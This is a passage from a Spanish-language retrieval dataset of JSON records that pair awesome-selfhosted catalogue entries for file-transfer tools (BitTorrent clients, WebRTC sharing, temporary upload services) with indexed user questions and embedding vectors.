-0.00575, -0.04133, -0.05592, 0.0881, 0.02535, -0.00994, -0.04479, 0.13849, -0.01229, 0.0885, -0.02134, -0.04626, -0.01638, -0.0526, -0.0285, -0.03817, 0.03795, -0.04389, 0.04671, -0.05717, -0.1209, -0.08142, 0.12138, 0.03339, 0.01626, -0.00723, 0.03887, -0.02415, -0.05879, -0.00188, 0.00576, 0.03563, -0.01526, 0.02741, 0.01589, 0.00694, -0.09592, 0.02939, 0.00328, -0.11119, -0.05895, 0.11824, -0.05944, -0.01336, 0.06834, -0.14958, 0.02803, 0.0023, -0.03476, -0.01502, 0.029, 0.0324, 0.02796, -0.00173, 0.0131, -0.101, -0.06648, -0.01097, 0.0058, -0.0304, -0.01297, -0.02602, -0.02737, -0.01177, 0.03882, -0.08819, -0.03984, -0.02499, 0.0091, -0.07244, 0.04301, -0.03139, 0.09366, 0.01341, 0.0208, 0.07817, -0.05723, -0.04711, 0.00445, -0.00386, -0.07848, 0.02492, -0.01438, 0.06234, 0.01288, 0.05967, 0.01589, -0.02612, 0.04113, 0.02727, 0.00929, -0.00462, -0.00436, -0.01048, 0.029, -0.01539, 0.00553, 0.02115, -0.005, 0.01034, -0.006, -0.03815, -0.03986, 0.04294, 0.11152, -0.03891, 0.0129, -0.03541, -0.05584, -0.07238, -0.04262, -0.00722, -0.01249, -0.01519, 0.08163, 0.03264, 0.05629, 0.0098, -0.05801]} -{"tipo": "pregunta", "herramienta": "File Transfer - Peer-to-peer Filesharing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Peer-to-peer Filesharing", "tema": "file transfer - peer-to-peer filesharing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Peer-to-peer Filesharing: bittorrent-tracker β€” Simple, robust, BitTorrent tracker (client and server) implementation [MIT, Nodejs]. Deluge β€” Lightweight, cross-platform BitTorrent client [GPL-3.0, Python/deb]. PrivyDrop β€” Simple and user-friendly, breakpoint-resumable peer-to-peer text, image, and file transfer tool based on WebRTC [MIT, Docker/Nodejs]. qBittorrent β€” Free cross-platform bittorrent client with a feature rich Web UI for remote access [GPL-2.0, C++]. slskd β€” A modern client-server application for the Soulseek file sharing network [⚠, AGPL-3.0, Docker/C#]. Transmission β€” Fast, easy, free Bittorrent client [GPL-3.0, C++/deb]. Webtor β€” Web-based torrent client with instant audio/video streaming [MIT, Docker].", "indexar": "que programa me permite compartir archivos de forma peer-to-peer sin usar un servidor central?", "v": [0.10503, -0.00161, -0.11846, -0.23069, 0.0094, -0.11077, 0.04401, -0.19244, -2e-05, -0.16323, -0.07163, 0.07618, 0.0006, -0.16141, 0.00853, -0.06026, 0.09169, -0.01139, 0.16938, 0.02638, 0.01531, 0.1103, -0.02751, -0.142, -0.0723, 0.08456, 0.10114, -0.07374, -0.04585, -0.01237, -0.01609, -0.03598, 0.05696, -0.04425, -0.01527, -0.07755, 0.00613, 0.11711, -0.09237, 0.05522, -0.01349, 0.08353, -0.09833, 0.09691, 0.01059, 0.01358, -0.02058, -0.02604, 0.07317, 0.01732, -0.06878, -0.05897, -0.15157, 0.04562, -0.055, -0.02103, 0.03468, -0.13146, 0.01295, -0.09838, -0.15757, 0.10961, -0.03516, -0.09738, 0.01799, 0.01402, -0.01127, 0.00637, -0.16033, 0.09614, 0.00445, 0.06389, 0.0583, -0.05422, 0.04447, 0.04465, -0.02901, -0.09319, -0.00441, -0.03173, 0.06073, 0.03504, 0.03294, 0.12539, -0.04023, 0.00755, 0.13464, 0.00628, -0.05177, 0.04634, 0.03564, 0.05702, 0.00161, 0.05327, 0.01855, -0.10158, 0.0531, -0.0265, -0.0447, -0.03167, 0.13227, 0.01834, -0.04052, 0.06924, 0.02992, 0.06061, 0.06128, -0.02762, -0.0395, -0.03681, 0.08887, 0.09116, 0.00606, 0.0098, -0.10993, 0.00399, -0.02068, -0.00354, 0.01592, -0.07388, -0.03848, -0.02705, 0.00989, 0.02239, 0.09432, -0.04343, 0.05975, 0.10351, -0.06112, 0.0753, -0.00465, 0.03347, -0.04204, -0.02612, -0.09835, -0.06804, 0.08287, 0.00138, 0.00344, -0.05577, 0.03685, 0.01883, 0.003, 0.00585, 0.12036, -0.02348, 0.09859, -0.10514, -0.03695, -0.00969, -0.01353, -0.04914, -0.05172, -0.06463, -0.1224, -0.02696, 0.01807, -0.10256, -0.10528, 0.04209, -0.02498, 0.03841, -0.02312, -0.00903, 0.04039, -0.01262, 0.08896, 0.03338, 0.07974, 0.06763, 0.0096, 0.05672, -0.01781, -0.04151, 0.02281, 0.01289, -0.04114, -0.07003, 0.00315, 0.00517, -0.08075, 0.00314, -0.02619, 0.05548, -0.04115, -0.01272, -0.01152, 0.08802, -0.01216, 0.01738, -0.00593, 0.02315, -0.04027, 0.04557, 0.0215, -0.09689, -0.06552, -0.00217, 0.05074, 0.00608, -0.05078, -0.0347, -0.02348, -0.00606, 0.00856, 0.01596, -0.05973, 0.01151, 0.04097, 0.05046, -0.00926, -0.07403, 0.09264, -0.04269, -0.03483, -0.01072, 0.01897, -0.01203, 0.04392, -0.04719, -0.04993, -0.00324, 0.03214, 0.00864, 0.04873, -0.00135, 0.00856, 0.02238, 0.00524, -0.03083, -0.03471, -0.01714, -0.02989, -0.02588, 0.03746, -0.02622, -0.01536, -0.05958, -0.03884, -0.09529, -0.03739, 0.07974, 0.01351, -0.0458, 0.0101, -0.00231, -0.06522, 0.0222, -0.01781, -0.03034, -0.01139, -0.00786, 0.03546, -0.0388, 0.02858, 0.04024]} -{"tipo": "pregunta", "herramienta": "File Transfer - Peer-to-peer Filesharing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Peer-to-peer Filesharing", "tema": "file transfer - peer-to-peer filesharing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Peer-to-peer Filesharing: bittorrent-tracker β€” Simple, robust, BitTorrent tracker (client and server) implementation [MIT, Nodejs]. Deluge β€” Lightweight, cross-platform BitTorrent client [GPL-3.0, Python/deb]. PrivyDrop β€” Simple and user-friendly, breakpoint-resumable peer-to-peer text, image, and file transfer tool based on WebRTC [MIT, Docker/Nodejs]. qBittorrent β€” Free cross-platform bittorrent client with a feature rich Web UI for remote access [GPL-2.0, C++]. slskd β€” A modern client-server application for the Soulseek file sharing network [⚠, AGPL-3.0, Docker/C#]. Transmission β€” Fast, easy, free Bittorrent client [GPL-3.0, C++/deb]. Webtor β€” Web-based torrent client with instant audio/video streaming [MIT, Docker].", "indexar": "cual es una alternativa libre a deluge para descargar y subir archivos directamente entre dispositivos?", "v": [-0.13682, 0.06469, -0.14672, -0.12282, -0.03204, -0.05021, -0.08299, -0.04732, -0.0641, -0.0628, -0.14533, -0.23081, -0.12433, 0.0093, 0.0363, -0.13431, 0.02994, -0.03211, 0.11799, -0.04131, 0.07032, 0.05749, -0.03478, -0.13158, -0.05133, -0.02495, 0.02816, 0.10443, -0.14769, -0.10159, 0.04059, 0.00999, 0.06409, 0.00317, -0.10466, 0.03195, 0.12511, 0.11381, 0.01782, -0.08056, 0.01016, -0.05625, -0.11711, 0.10707, -0.04747, -0.14441, -0.00954, 0.01107, 0.04922, 0.00953, -0.03496, 0.0489, 0.00313, 0.02458, -0.13228, -0.04007, 0.11151, -0.17628, 0.00988, -0.06412, -0.06557, 0.0615, -0.01215, -0.04423, 0.00845, 0.04274, -0.08628, 0.10347, -0.178, 0.01921, 0.11574, 0.04404, 0.04283, 0.04909, -0.0819, 0.1445, -0.07589, -0.07361, -0.04636, 0.01862, 0.11652, -0.07407, 0.04365, 0.05941, -0.06733, -0.07409, 0.03813, -0.02681, 0.03392, 0.0431, 0.12041, -0.0298, 0.01813, 0.0182, -0.03157, -0.1226, 0.00131, 0.01618, 0.03042, 0.02045, -0.00706, 0.00357, 0.01435, 0.08456, 0.03785, 0.02832, -0.01105, 0.00298, -0.0277, 0.00313, 0.03065, 0.02727, 0.08575, 0.02634, -0.07058, -0.03525, -0.0018, -0.05749, -0.05913, -0.02169, -0.04448, -0.00074, 0.00143, -0.09055, 0.07157, 0.01049, 0.06415, 0.04568, -0.09659, 0.06791, 0.11528, -0.04207, -0.02885, -0.04366, -0.11058, -0.11195, 0.08004, -0.02025, -0.03279, -0.02072, 0.10954, 0.02144, -0.04921, -0.01293, 0.08023, -0.03428, -0.03745, -0.0197, 0.02056, -0.09212, -0.04033, 0.01009, 0.00111, 0.01133, 0.00765, 0.06068, -0.03565, -0.09084, -0.06845, 0.07018, -0.01123, -0.00693, -0.02297, -0.0057, -0.11989, -0.0373, 0.00268, -0.00349, -0.0098, 0.01928, 0.00807, 0.05922, 0.04118, -0.09312, 0.04636, 0.00933, 0.02843, -0.05933, 0.05031, -0.02477, -0.01747, 0.02665, -0.02128, 0.00098, -0.04268, -0.04553, 0.03066, 0.01917, -0.01414, 0.06319, -0.10455, 0.01932, -0.05794, -0.01148, 0.01175, -0.0047, -0.0245, -0.01379, -0.03938, 0.02781, -0.06447, -0.0614, -0.0356, -0.01312, 0.01822, -0.05896, 0.00465, 0.02309, 0.03052, 0.01786, -0.02022, 0.01905, 0.09781, -0.01935, 0.00288, -0.00211, 0.00987, 0.02823, 0.01513, -0.03155, 0.0196, 0.03919, 0.0763, 0.01503, -0.01597, 0.04222, -0.00653, 0.03392, -0.06719, -0.04391, -0.02506, 0.02913, 0.0389, 0.03148, 0.03246, 0.04127, 0.02589, 0.04849, 0.00921, -0.01438, 0.02514, 0.09856, 0.04234, -0.02348, -0.1101, 0.0309, -0.03648, -0.03729, -0.01499, -0.05492, -0.01934, 0.07259, 0.01732, 0.0488, -0.01766, 0.01328]} -{"tipo": "pregunta", "herramienta": "File Transfer - Peer-to-peer Filesharing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Peer-to-peer Filesharing", "tema": "file transfer - peer-to-peer filesharing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Peer-to-peer Filesharing: bittorrent-tracker β€” Simple, robust, BitTorrent tracker (client and server) implementation [MIT, Nodejs]. Deluge β€” Lightweight, cross-platform BitTorrent client [GPL-3.0, Python/deb]. PrivyDrop β€” Simple and user-friendly, breakpoint-resumable peer-to-peer text, image, and file transfer tool based on WebRTC [MIT, Docker/Nodejs]. qBittorrent β€” Free cross-platform bittorrent client with a feature rich Web UI for remote access [GPL-2.0, C++]. slskd β€” A modern client-server application for the Soulseek file sharing network [⚠, AGPL-3.0, Docker/C#]. Transmission β€” Fast, easy, free Bittorrent client [GPL-3.0, C++/deb]. Webtor β€” Web-based torrent client with instant audio/video streaming [MIT, Docker].", "indexar": "con que herramienta puedo transferir texto e imagenes de forma resumible utilizando webrtc?", "v": [0.04279, 0.10101, -0.17214, -0.17911, 0.17471, -0.10084, -0.05696, -0.05393, 0.00078, -0.04047, -0.11156, -0.08875, 0.05264, -0.01956, 0.08127, 0.05837, 0.0945, -0.08594, 0.01523, -0.09762, 0.08803, -0.09668, -0.10791, -0.06678, -0.10465, -0.05057, -0.08256, 0.00311, -0.11769, 0.04605, -0.0208, 0.02726, 0.09293, -0.01294, -0.05522, -0.03314, 0.08123, 0.12922, -0.06987, 0.02442, -0.01338, 0.0795, -0.10296, 0.14624, -0.09325, -0.10206, -0.09128, -0.07309, 0.02493, -0.03501, 0.05814, -0.10775, -0.2182, -0.00784, -0.09012, -0.11418, 0.2731, -0.158, 0.08855, -0.03341, 0.03537, 0.1164, -0.05321, 0.03128, -0.02404, 0.0181, -0.03521, -0.00718, -0.10192, 0.08117, 0.04493, 0.09067, 0.04201, -0.00271, -0.04076, -0.01794, -0.10087, 0.00583, 0.0288, -0.03465, 0.02879, -0.07738, -0.02324, -0.02139, -0.04201, -0.01476, 0.02677, -0.02662, 0.07358, -0.07389, 0.03232, -0.06559, 0.06052, 0.01085, -0.01543, -0.05555, -0.02508, 0.01652, 0.00912, -0.03732, 0.07522, 0.04432, -0.06694, 0.00191, -0.00618, 0.06469, 0.01163, -0.08644, -0.05322, -0.09998, 0.08219, -0.0255, -0.03404, 0.00559, 0.03075, 0.0604, -0.0354, -0.03308, -0.03445, -0.10243, -0.00558, 0.00419, -0.01304, 0.02486, 0.02976, 0.01617, -0.0292, 0.08395, -0.05628, -0.03715, -0.01776, -0.01285, -0.09794, -0.06124, -0.02279, -0.02757, 0.05534, -0.05108, 0.01895, -0.04748, -0.062, 0.03849, -0.05031, -0.05455, 0.00579, 0.04396, 0.04839, -0.0449, -0.0854, -0.03099, 0.04117, 0.02386, 0.03419, 0.05106, -0.01251, -0.00098, -0.02987, 0.01461, -0.13755, -0.00822, -0.07389, 0.03867, 0.09596, 0.01445, -0.06167, -0.00224, -0.06088, -0.02636, 0.04241, 0.04978, 0.00494, 0.00717, 0.04187, -0.03171, 0.05581, -0.03191, -0.07204, 0.0188, -0.04741, -0.05955, -0.01339, 0.01499, -0.03812, 0.03173, 0.03861, -0.01831, -0.04183, 0.05329, -0.05709, 0.0174, -0.02279, 0.02483, 0.00365, -0.01247, 0.06045, 0.04343, -0.08627, -0.02355, 0.05142, -0.02593, -0.07233, -0.05503, 0.02721, -0.06494, 0.04892, 0.05341, -0.07878, 0.01573, -0.04581, 0.08177, -0.0052, 0.01452, 0.03795, -0.05736, -0.00606, -0.00271, -0.01615, -0.03493, -0.05851, 0.02452, 0.02514, 0.05716, 0.04382, 0.0337, 0.03306, 0.08373, -0.00889, 0.0034, 0.00291, 0.00654, -0.00939, 0.04093, 0.00764, -0.05253, 0.0351, -0.05223, -0.01286, -0.04728, -0.10501, -0.03738, -0.01231, 0.02355, -0.01758, 0.01856, -0.03152, -0.03487, -0.09851, -0.00884, -0.0214, -0.07712, -0.01349, -0.0282, 0.03848, -0.04958, 0.01517, -0.0077]} -{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: 015 β€” A temporary file sharing platform. Focused on providing one-time, temporary file and text upload, processing, and sharing services [AGPL-3.0, Docker]. Chibisafe β€” File uploader service that aims to to be easy to use and set up. It accepts files, photos, documents, anything you imagine and gives you back a shareable link for you to send to others [MIT, Docker/Nodejs]. Digirecord β€” Record and share audio files (documentation in French) [AGPL-3.0, Nodejs/PHP]. elixire β€” Simple yet advanced screenshot uploading and link shortening service [AGPL-3.0, Python]. Files Sharing β€” File sharing application based on unique and temporary links [GPL-3.0, PHP/Docker]. Flare β€” A nonbloated, modern, and highly configurable file/screenshot vault server with support for ShareX, Flameshot, and Spectacle. Offers OCR search and more [MIT, Docker/Nodejs].", "indexar": "con quΓ© puedo subir un archivo temporalmente y obtener un enlace para compartirlo?", "v": [-0.01905, 0.22519, -0.15988, -0.08028, -0.05081, -0.10961, 0.00063, -0.02648, -0.00933, -0.07028, -0.16873, -0.09617, 0.01215, 0.02722, 0.01163, 0.01546, 0.11946, -0.01662, 0.11435, -0.06924, 0.10472, 0.01822, -0.05288, -0.096, -0.00513, -0.12918, 0.00383, 0.06782, -0.09527, -0.02346, -0.02114, 0.0372, 0.05671, 0.08227, 0.02177, 0.09753, 0.1623, 0.19886, -0.0631, -0.07774, 0.00528, 0.0557, -0.13711, 0.02714, -0.12028, -0.09043, -0.06217, 0.03733, 0.0321, -0.0034, 0.01955, -0.00261, -0.06629, -0.04833, -0.17152, 0.02093, 0.12256, -0.17813, 0.06304, 0.01809, -0.07103, 0.04653, -0.04294, -0.01167, -0.04702, -0.07526, -0.09909, 0.10939, -0.13564, 0.10383, -0.12068, 0.04367, 0.07787, 0.03361, -0.05209, 0.05097, -0.03746, -0.1641, -0.02614, -0.011, -0.00902, 0.07215, 0.11309, 0.07412, -0.07158, -0.05887, 0.02617, -0.03985, 0.02032, -0.04096, 0.09236, 0.00807, 0.01607, -0.08314, -0.01616, -0.0414, -0.07712, -0.06301, -0.07478, -0.0265, -0.00573, 0.00738, 0.01957, 0.10938, 0.05897, 0.06153, 0.01324, 0.05276, -0.03144, 0.03406, 0.04891, 0.05917, 0.06311, 0.04799, -0.06966, 0.01591, -0.0144, -0.04312, -0.02415, -0.01529, 0.03859, -0.0029, 0.02878, 0.03771, -0.03513, -0.04167, 0.03357, 0.09581, -0.06228, -0.00532, -0.0827, -0.00286, -0.00487, -0.09714, 0.00159, -0.02718, 0.07388, 0.04055, -0.00763, -0.0735, 0.02861, -0.05362, -0.04142, 0.01388, 0.01479, -0.00339, -0.09113, -0.04806, -0.02847, -0.12077, -0.02869, 0.00577, -0.01579, -0.04445, 0.00278, -0.01259, 0.05538, -0.08304, -0.07356, -0.0513, -0.01712, 0.08937, 0.00756, -0.03163, -0.03277, -0.0374, -0.02549, -0.02041, -0.00291, -0.03555, -0.00174, -0.01486, -0.05298, -0.07805, 0.04372, -0.00827, -0.06316, -0.06258, -0.00643, 0.0473, 0.00111, -0.00026, 0.07471, 0.09717, -0.03026, -0.07887, 0.08326, -0.01094, -0.0152, 0.04263, -0.02419, -0.01307, 0.02549, 0.06661, 0.05672, -0.03795, -0.03291, -0.00125, -0.0162, 0.08203, -0.01763, -0.10905, 0.01979, 0.02841, 0.01773, -0.08714, -0.0377, 0.03232, 0.00926, 0.04115, -0.0058, 0.03028, 0.08052, -0.09443, 0.00479, 0.0414, -0.0086, 0.05348, -0.03554, -0.05222, 0.00046, 0.04634, 0.08849, 0.01605, 0.05614, 0.01249, -0.0059, 0.03098, -0.02125, 0.01608, -0.02073, 0.05336, 0.04976, 0.03753, 0.06123, -0.03015, 0.00289, 0.05096, 0.02931, -0.0005, 0.00204, 0.04518, 0.03719, -0.00705, -0.02931, 0.02552, -0.04965, 0.01384, 0.03251, -0.07756, -0.05441, -0.05678, -0.00989, -0.00108, -0.02763, 0.01485]} -{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: 015 β€” A temporary file sharing platform. Focused on providing one-time, temporary file and text upload, processing, and sharing services [AGPL-3.0, Docker]. Chibisafe β€” File uploader service that aims to to be easy to use and set up. It accepts files, photos, documents, anything you imagine and gives you back a shareable link for you to send to others [MIT, Docker/Nodejs]. Digirecord β€” Record and share audio files (documentation in French) [AGPL-3.0, Nodejs/PHP]. elixire β€” Simple yet advanced screenshot uploading and link shortening service [AGPL-3.0, Python]. Files Sharing β€” File sharing application based on unique and temporary links [GPL-3.0, PHP/Docker]. Flare β€” A nonbloated, modern, and highly configurable file/screenshot vault server with support for ShareX, Flameshot, and Spectacle. Offers OCR search and more [MIT, Docker/Nodejs].", "indexar": "quΓ© herramienta sirve para enviar fotos y documentos rΓ‘pidamente sin tener que crear una cuenta?", "v": [-0.04042, 0.14869, -0.18327, -0.14084, 0.06262, -0.19038, -0.05925, -0.03955, -0.01783, -0.13444, -0.15404, -0.1357, 0.05551, -0.14264, 0.08827, 0.00028, 0.12293, -0.10224, 0.0883, 0.00533, 0.01572, 0.0289, -0.0506, -0.09255, -0.12713, -0.04828, 0.08363, -0.05638, -0.15137, 0.10482, 0.07854, -0.00497, 0.01669, 0.00799, -0.07053, -0.04121, 0.0633, 0.01003, -0.11855, 0.07947, 0.02603, 0.07299, -0.08078, 0.1483, -0.10748, 0.02578, -0.02076, 0.08555, -0.02753, 0.08935, -0.00071, -0.10663, -0.09602, 0.0394, -0.11072, -0.14242, 0.1655, -0.15203, 0.03855, -0.09475, -0.0406, 0.08639, -0.07393, 0.02082, -0.03491, -0.04067, 0.03046, -0.06734, -0.06212, 0.0101, -0.03986, 0.00049, 0.08934, -0.02506, -0.0575, -0.04083, -0.06921, 0.00094, -0.08662, 0.03768, 0.04953, -0.0127, -0.12362, -0.02028, -0.08932, -0.11803, 0.05463, 0.01169, 0.05255, -0.07562, -0.00277, 0.04031, 0.02287, 0.00242, 0.03572, -0.00505, 0.03067, -0.01278, -0.00018, 0.02861, 0.03023, -0.09638, -0.06547, 0.01623, -0.09701, -0.01537, 0.02372, -0.04823, -0.09368, 0.00772, 0.0219, -0.01577, -0.02363, 0.05129, -0.04396, 0.00149, -0.03344, -0.05082, -0.04495, -0.03094, 0.01869, 0.02563, -0.01024, -0.00338, -0.01595, -0.05174, -0.05462, 0.0305, -0.04493, 0.03965, -0.02275, -0.05988, -0.11928, -0.00701, 0.03006, -0.03972, -0.02954, -0.12158, -0.01782, -0.09153, -0.04036, -0.05054, -0.05739, -0.16581, -0.0421, 0.06747, -0.00072, -0.05958, -0.05267, 0.01282, -0.0028, -0.05344, 0.01789, 0.01877, -0.07407, 0.0266, -0.03785, -0.03533, -0.098, -0.02299, -0.05311, 0.04676, 0.05806, 0.07856, -0.00501, -0.1182, -0.02377, 0.01167, 0.05105, 0.01518, 0.03586, -0.01607, 0.04674, -0.06391, 0.05233, -0.04929, -0.02599, -0.04342, -0.01633, -0.03733, -0.05154, 0.00877, -0.0086, 0.0327, 0.02255, -0.04022, 0.04815, -0.02994, 0.01654, 0.03171, -0.01459, 0.05651, 0.00687, -0.01744, 0.018, -0.03383, -0.04225, -0.04559, 0.08069, -0.03608, -0.02634, -0.06596, -0.01454, -0.01406, 0.02746, 0.01735, -0.08788, 0.04038, -0.02693, -0.0049, -0.01501, -0.00015, 0.06376, -0.02794, -0.05897, -0.01736, 0.03332, -0.0137, -0.0094, -0.02195, 0.09249, -0.02776, 0.02308, 0.00192, 0.05141, 0.05709, 0.02908, 0.01147, 0.01711, -0.02237, 0.0266, 0.04016, -0.04327, -0.02826, 0.05786, -0.00707, 0.04454, -0.06242, -0.04527, -0.04986, 0.01668, 0.01673, -0.02358, -0.02061, -0.06301, 0.0006, -0.02145, 0.00124, -0.00671, -0.1003, -0.00536, 0.02725, 0.0852, -0.02672, 0.03922, -0.07234]} -{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: 015 β€” A temporary file sharing platform. Focused on providing one-time, temporary file and text upload, processing, and sharing services [AGPL-3.0, Docker]. Chibisafe β€” File uploader service that aims to to be easy to use and set up. It accepts files, photos, documents, anything you imagine and gives you back a shareable link for you to send to others [MIT, Docker/Nodejs]. Digirecord β€” Record and share audio files (documentation in French) [AGPL-3.0, Nodejs/PHP]. elixire β€” Simple yet advanced screenshot uploading and link shortening service [AGPL-3.0, Python]. Files Sharing β€” File sharing application based on unique and temporary links [GPL-3.0, PHP/Docker]. Flare β€” A nonbloated, modern, and highly configurable file/screenshot vault server with support for ShareX, Flameshot, and Spectacle. Offers OCR search and more [MIT, Docker/Nodejs].", "indexar": "cual es una alternativa libre a los servicios de upload tradicional para guardar capturas de pantalla?", "v": [0.04289, 0.07127, -0.19524, -0.15073, -0.15751, -0.08431, 0.04754, -0.00867, -0.02424, -0.04899, -0.05766, -0.18723, -0.04368, 0.06871, -0.01521, -0.03496, 0.06527, -0.04745, 0.14907, 0.03777, -0.10301, 0.12248, -0.05641, -0.1216, -0.08334, -0.09938, 0.04861, -0.00946, -0.15805, -0.05641, 0.0399, 0.00779, 0.04619, -0.02445, -0.08876, -0.0697, 0.13489, 0.05995, -0.03147, -0.06921, 0.05239, -0.03136, -0.04907, 0.03933, -0.04762, -0.07282, 0.05746, 0.05936, -0.02682, 0.02434, -0.01796, 0.00576, -0.04901, 0.04307, -0.04332, -0.07076, 0.08605, -0.0672, -0.00774, -0.01075, -0.07671, 0.08449, -0.01209, 0.05559, 0.02684, -0.05336, -0.08995, 0.08274, -0.08101, 0.06903, 0.12057, 0.07401, 0.06913, 0.09503, -0.10562, 0.02108, -0.1287, -0.05196, -0.04431, 0.03836, -0.05046, -0.13017, -0.01335, 0.02582, -0.111, -0.10172, -0.03571, -0.09824, -0.06754, -0.07685, 0.12298, 0.00745, -0.00764, 0.07997, -0.00777, -0.11141, -0.00516, 0.10476, -0.00978, 0.04278, 0.08541, -0.007, -0.04286, -0.00609, 0.00933, -0.00148, -0.00725, -0.03544, -0.06166, 0.04632, -0.02601, 0.05764, -0.06507, 0.1056, -0.06624, -0.04203, -0.00155, -0.07473, 0.00873, 0.08331, -0.03617, -0.05324, -0.01102, -0.08293, 0.09073, 0.00248, 0.03793, 0.07284, -0.09823, 0.03401, 0.01735, -0.02191, -0.04282, -0.04733, -0.04851, -0.11601, 0.12421, -0.03952, -0.00263, -0.07891, -0.02959, -0.00202, -0.00871, -0.0726, 0.07648, -0.01629, 0.04217, -0.02086, -0.06828, 0.0275, -0.01123, -0.02322, -0.03529, 0.05002, 0.03143, 0.0806, -0.05108, -0.10558, -0.04044, 0.05083, 0.08175, -0.0988, 0.02995, 0.03886, -0.06045, -0.04346, 0.02387, -0.0417, -0.04303, -0.00056, -0.00648, 0.07688, -0.00447, -0.13729, 0.01673, -0.01175, -0.03194, -0.06794, 0.09195, -0.0841, -0.02171, 0.10711, -0.01897, 0.06215, 0.04093, -0.10133, -0.01876, -0.01082, -0.00346, -0.02288, -0.01561, -0.01415, -0.09869, -0.05016, -0.0002, -0.02466, -0.02987, -0.0005, 0.01579, 0.00346, -0.05215, -0.0443, -0.01218, -0.03866, -0.05514, -0.04029, -0.0394, 0.07881, 0.00259, 0.04607, -0.02065, 0.05594, 0.10349, -0.04832, -0.02671, -0.04357, 0.06538, -0.0416, 0.00261, -0.01167, -0.00325, 0.01277, 0.00057, 0.04566, -0.05311, 0.00432, 0.05534, 0.06856, -0.02599, -0.04181, 0.00831, 0.02214, -0.00567, 0.04207, -0.01245, 0.0109, -0.01138, -0.06014, -0.01326, -0.01612, 0.07692, 0.04435, -0.07089, 0.02744, -0.04279, 0.04022, -0.0874, -0.00142, 0.01667, -0.08192, -0.04043, 0.02864, 0.04564, 0.03504, -0.01507, -0.0082]} -{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: Gokapi β€” Lightweight server to share files, which expire after a set amount of downloads or days. Similar to the discontinued Firefox Send, with the difference that only the admin is allowed to upload files [GPL-3.0, Go/Docker]. goploader β€” Easy file sharing with server-side encryption, curl/httpie/wget compliant [MIT, Go]. GoSƐ β€” Modern file-uploader focusing on scalability and simplicity. It only depends on a S3 storage backend and hence scales horizontally without the need for additional databases or caches [Apache-2.0, Go/Docker]. Jirafeau β€” One-click-fileshare project. Select your file, upload, and share a link. That's it [AGPL-3.0, PHP/Docker]. OnionShare β€” Securely and anonymously share a file of any size [GPL-3.0, Python/deb]. PicoShare β€” Minimalist, easy-to-host service for sharing images and other files [AGPL-3.0, Go/Docker]. Picsur β€” Simple imaging hosting platform that allows you to easily host, edit, and share images [AGPL-3.0, Docker].", "indexar": "que programa puedo usar para compartir archivos de forma segura y temporal?", "v": [-0.04451, 0.02166, -0.22541, -0.20279, -0.08518, -0.0812, -0.02531, -0.09792, -0.0071, -0.0379, -0.0983, -0.04477, 0.12113, 0.03542, -0.05955, 0.0362, 0.16165, -0.10844, 0.11251, 0.00485, 0.07196, 0.0094, -0.08059, -0.11254, -0.02504, -0.0066, -0.00022, -0.02422, -0.06298, -0.02514, 0.00451, 0.04034, 0.16224, -0.0921, -0.08194, 0.08321, 0.04075, 0.08842, -0.02789, 0.01498, 0.00402, 0.06041, -0.07191, 0.03342, 0.01147, 0.03095, -0.03214, -0.02329, -0.0013, -0.06919, -0.06552, -0.00733, -0.05593, 0.02662, -0.04168, -0.06, 0.0511, -0.17632, -0.03552, 0.00862, -0.08319, 0.05336, -0.06881, 0.05499, -0.01148, -0.04833, 0.03217, 0.09251, -0.2035, 0.07796, -0.01336, -0.04548, 0.10131, 0.04757, -0.06578, -0.03247, -0.04835, -0.08137, 0.04453, -0.02099, -0.02816, 0.08223, 0.11237, 0.11168, -0.06554, -0.04887, 0.07285, -0.06412, -0.06667, -0.03394, -0.00246, -0.0261, 0.05748, 0.0075, 0.00963, -0.09052, 0.06247, 0.01729, -0.06752, -0.02878, 0.06106, -0.03647, 0.01894, 0.09321, 0.01963, 0.0216, 0.03436, 0.11522, 0.04895, -0.01728, 0.01253, 0.0363, -0.07404, -0.01178, -0.07499, 0.11071, -0.01708, -0.05118, 0.06397, -0.07021, 0.04268, 0.09192, -0.03198, 0.03747, 0.17013, 0.02424, 0.05154, 0.10457, -0.15561, 0.06465, -7e-05, 0.03606, -0.03647, -0.04809, -0.11811, -0.04794, 0.05488, 0.03609, -0.01415, -0.10213, 0.00359, 0.00516, -0.01805, 0.01925, 0.02327, -0.00037, -0.00126, -0.03298, 0.00087, -0.06162, 0.00655, 0.03546, -0.04219, -0.02239, -0.0783, -0.01756, 0.0411, -0.02216, -0.1127, 